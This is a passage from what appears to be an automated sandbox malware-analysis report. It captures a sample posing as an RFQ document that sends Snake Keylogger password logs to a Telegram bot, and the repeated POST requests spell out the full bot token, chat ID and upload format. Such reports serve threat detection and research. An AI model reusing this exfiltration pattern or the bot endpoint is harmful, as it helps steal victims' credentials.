                                            2021-09-28 06:00:05 UTC521OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 62 35 62 32 35 36 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255fb5b2567Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 06:00:05 UTC521INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 06:00:05 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 06:00:05 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 39 31 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 38 30 35 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12913,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808805,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            33192.168.2.449807149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:27 UTC52OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255c5d02817
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:27 UTC52OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 35 64 30 32 38 31 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255c5d02817Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:27 UTC53INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:27 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:27 UTC53INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 31 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 37 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12613,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808707,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            330192.168.2.450167149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 06:00:05 UTC522OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255fb77c217
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 06:00:05 UTC522OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 62 37 37 63 32 31 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255fb77c217Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 06:00:05 UTC523INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 06:00:05 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 06:00:05 UTC523INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 39 31 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 38 30 35 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12914,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808805,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            331192.168.2.450168149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 06:00:05 UTC524OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255fb8f9955
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 06:00:05 UTC524OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 62 38 66 39 39 35 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255fb8f9955Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 06:00:05 UTC524INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 06:00:05 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 06:00:05 UTC525INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 39 31 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 38 30 35 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12915,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808805,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            332192.168.2.450169149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 06:00:05 UTC525OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255fbac356b
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 06:00:05 UTC526OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 62 61 63 33 35 36 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255fbac356bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 06:00:05 UTC526INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 06:00:05 GMT
                                            Content-Type: application/json
                                            Content-Length: 521
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 06:00:05 UTC526INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 39 31 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 38 30 35 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12916,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808805,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            333192.168.2.450170149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 06:00:05 UTC527OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255fbc66f63
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 06:00:05 UTC527OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 62 63 36 36 66 36 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255fbc66f63Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 06:00:05 UTC528INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 06:00:05 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 06:00:05 UTC528INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 39 31 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 38 30 35 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12917,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808805,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            334192.168.2.450171149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 06:00:05 UTC528OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255fbe30b62
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 06:00:05 UTC529OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 62 65 33 30 62 36 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255fbe30b62Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 06:00:06 UTC529INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 06:00:06 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 06:00:06 UTC529INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 39 31 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 38 30 36 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12918,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808806,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            335192.168.2.450172149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 06:00:06 UTC530OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255fbffa78b
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 06:00:06 UTC530OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 62 66 66 61 37 38 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
